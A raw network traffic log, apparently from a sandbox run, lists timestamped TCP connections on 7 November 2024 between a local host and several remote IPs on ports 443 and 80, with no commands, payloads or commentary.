Nov 7, 2024 07:33:19.776909113 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.776916027 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.778306961 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.778465033 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.778470993 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.785003901 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.785043001 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.785049915 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.791078091 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.791136026 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.791142941 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.797204971 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.797286987 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.797293901 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.803169966 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.803220987 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.803226948 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.809237003 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.809310913 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.809318066 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.815468073 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.815512896 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.815519094 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.821533918 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.821588039 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.821595907 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.827522039 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.827584028 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.827590942 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.833550930 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.833616972 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.833622932 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.839755058 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.839817047 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.839826107 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.845612049 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.845655918 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.845663071 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.851711035 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.851754904 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.851759911 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.882355928 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.882400036 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.882406950 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.886255980 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.886285067 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.886333942 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.886342049 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.886384964 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.886447906 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.886682034 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.886720896 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.886728048 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.889159918 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.889194965 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.889215946 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.889223099 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.889269114 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.892946959 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.895236015 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.895278931 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.895291090 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.902122021 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.902179956 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.902194023 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.908122063 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.908160925 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.908164978 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.908174992 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.908219099 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.914181948 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.914387941 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.914438009 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.914446115 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.921650887 CET	49854	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:19.921650887 CET	49854	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:19.921680927 CET	443	49854	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:19.921916008 CET	49854	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:19.922691107 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.922751904 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.922759056 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.923692942 CET	49862	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.923718929 CET	443	49862	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.923806906 CET	49862	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.925559998 CET	49862	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.925574064 CET	443	49862	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.926249981 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.926299095 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.926306009 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.932774067 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.932821035 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.932842016 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.932849884 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.932893038 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.938383102 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.944622993 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.944669962 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.944669008 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.944683075 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.944720030 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.950539112 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.956693888 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.956866026 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.956873894 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.962486029 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.962534904 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.962569952 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.962569952 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.962580919 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.962620020 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.968780041 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.968946934 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:19.970102072 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:19.970251083 CET	443	49855	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.974698067 CET	49855	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.974740028 CET	443	49855	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.975152969 CET	49855	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.975157976 CET	443	49855	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.981282949 CET	443	49856	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.982934952 CET	49856	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.982948065 CET	443	49856	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:19.983344078 CET	49856	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:19.983347893 CET	443	49856	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.005925894 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.005971909 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.006042004 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.006050110 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.006095886 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.006100893 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.006143093 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.006187916 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.006195068 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.006576061 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.006611109 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.006632090 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.006639004 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.006787062 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.008153915 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.008248091 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.008559942 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.008567095 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.010638952 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.010705948 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.010711908 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.015137911 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.015203953 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.015211105 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.020781994 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.020864010 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.020870924 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.025562048 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.025641918 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.025650024 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.031488895 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.031533003 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.031558037 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.031565905 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.031608105 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.031691074 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.037707090 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.037746906 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.037766933 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.037775040 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.037842989 CET	49863	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:20.037858009 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.037888050 CET	443	49863	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:20.038121939 CET	49863	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:20.038376093 CET	49863	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:20.038391113 CET	443	49863	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:20.040339947 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.054754972 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.054816008 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.054821968 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.055018902 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.055068970 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.055075884 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.061512947 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.061559916 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.061562061 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.061573982 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.061621904 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.067653894 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.070084095 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.070276976 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.070283890 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.075758934 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.075807095 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.075814009 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.079505920 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.079566002 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.079572916 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.086986065 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.087074041 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.087080956 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.100671053 CET	443	49855	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.100858927 CET	443	49855	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.100917101 CET	49855	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.116651058 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.116688967 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.116714001 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.116722107 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.116765022 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.120059967 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.120147943 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.120209932 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.120218039 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.124921083 CET	49855	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.124938011 CET	443	49855	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.125344038 CET	443	49856	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.125413895 CET	443	49856	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.125463963 CET	49856	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.129848957 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.130034924 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.140887976 CET	443	49857	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.155793905 CET	49852	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.155805111 CET	443	49852	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.213606119 CET	443	49858	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.249540091 CET	49856	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.249562025 CET	443	49856	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.253094912 CET	49857	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.253108978 CET	443	49857	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.253911018 CET	49857	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.253914118 CET	443	49857	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.256042957 CET	49864	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.256066084 CET	443	49864	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.256196022 CET	49864	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.256330013 CET	49864	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.256336927 CET	443	49864	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.261396885 CET	443	49859	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.270392895 CET	49858	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.270411015 CET	443	49858	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.271044016 CET	49858	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.271049976 CET	443	49858	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.289911032 CET	49859	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.289922953 CET	443	49859	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.294363976 CET	49859	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.294368029 CET	443	49859	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.382018089 CET	443	49857	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.382069111 CET	443	49857	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.382129908 CET	49857	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.396365881 CET	443	49858	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.396779060 CET	443	49858	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.396810055 CET	443	49858	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.396840096 CET	49858	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.396881104 CET	49858	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.427577019 CET	443	49859	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.427824974 CET	443	49859	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.427881002 CET	49859	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.502831936 CET	443	49860	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:20.509658098 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.541889906 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.541907072 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.542020082 CET	49860	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:20.542028904 CET	443	49860	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:20.542259932 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.542576075 CET	443	49860	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:20.551378012 CET	49860	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:20.551454067 CET	443	49860	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:20.553816080 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.553881884 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.564377069 CET	49860	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:20.564459085 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.565870047 CET	49865	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.565901995 CET	443	49865	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.565967083 CET	49865	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.570329905 CET	49857	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.570338964 CET	443	49857	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.570683956 CET	49858	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.570712090 CET	443	49858	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.570723057 CET	49858	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.570729017 CET	443	49858	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.574165106 CET	49859	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.574165106 CET	49859	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.574172020 CET	443	49859	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.574178934 CET	443	49859	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.581522942 CET	49865	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.581536055 CET	443	49865	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.585617065 CET	49866	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.585640907 CET	443	49866	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.585731983 CET	49866	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.593884945 CET	49867	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.593894958 CET	443	49867	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.593945026 CET	49867	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.594185114 CET	49867	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.594194889 CET	443	49867	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.595336914 CET	49866	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.595350027 CET	443	49866	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.596849918 CET	49868	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.596892118 CET	443	49868	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.597021103 CET	49868	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.597239971 CET	49868	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:20.597254038 CET	443	49868	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:20.607367039 CET	443	49860	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:20.611335039 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.733711004 CET	443	49860	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:20.733783007 CET	443	49860	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:20.733859062 CET	49860	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:20.740861893 CET	49860	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:20.740870953 CET	443	49860	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:20.781588078 CET	443	49862	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.782135963 CET	49862	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.782149076 CET	443	49862	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.782430887 CET	443	49862	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.782851934 CET	49862	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.782903910 CET	443	49862	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.782989025 CET	49862	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.783013105 CET	443	49862	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.833595037 CET	49850	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:20.834184885 CET	49871	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:20.839018106 CET	80	49871	185.215.113.43	192.168.2.4
Nov 7, 2024 07:33:20.839138031 CET	49871	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:20.839293957 CET	80	49850	185.215.113.43	192.168.2.4
Nov 7, 2024 07:33:20.839351892 CET	49850	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:20.847805977 CET	49871	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:20.852657080 CET	80	49871	185.215.113.43	192.168.2.4
Nov 7, 2024 07:33:20.867551088 CET	443	49863	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:20.867857933 CET	49863	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:20.867875099 CET	443	49863	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:20.868206978 CET	443	49863	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:20.871170044 CET	49863	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:20.871232986 CET	443	49863	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:20.871342897 CET	49863	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:20.889512062 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.889622927 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.889679909 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.889693975 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.889705896 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.889741898 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.889750004 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.889756918 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.889801979 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.890156984 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.890199900 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.896522045 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.896590948 CET	49861	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.905400038 CET	443	49861	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.912096977 CET	49862	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.916404963 CET	49872	443	192.168.2.4	142.250.185.132
Nov 7, 2024 07:33:20.916416883 CET	443	49872	142.250.185.132	192.168.2.4
Nov 7, 2024 07:33:20.918833971 CET	49872	443	192.168.2.4	142.250.185.132
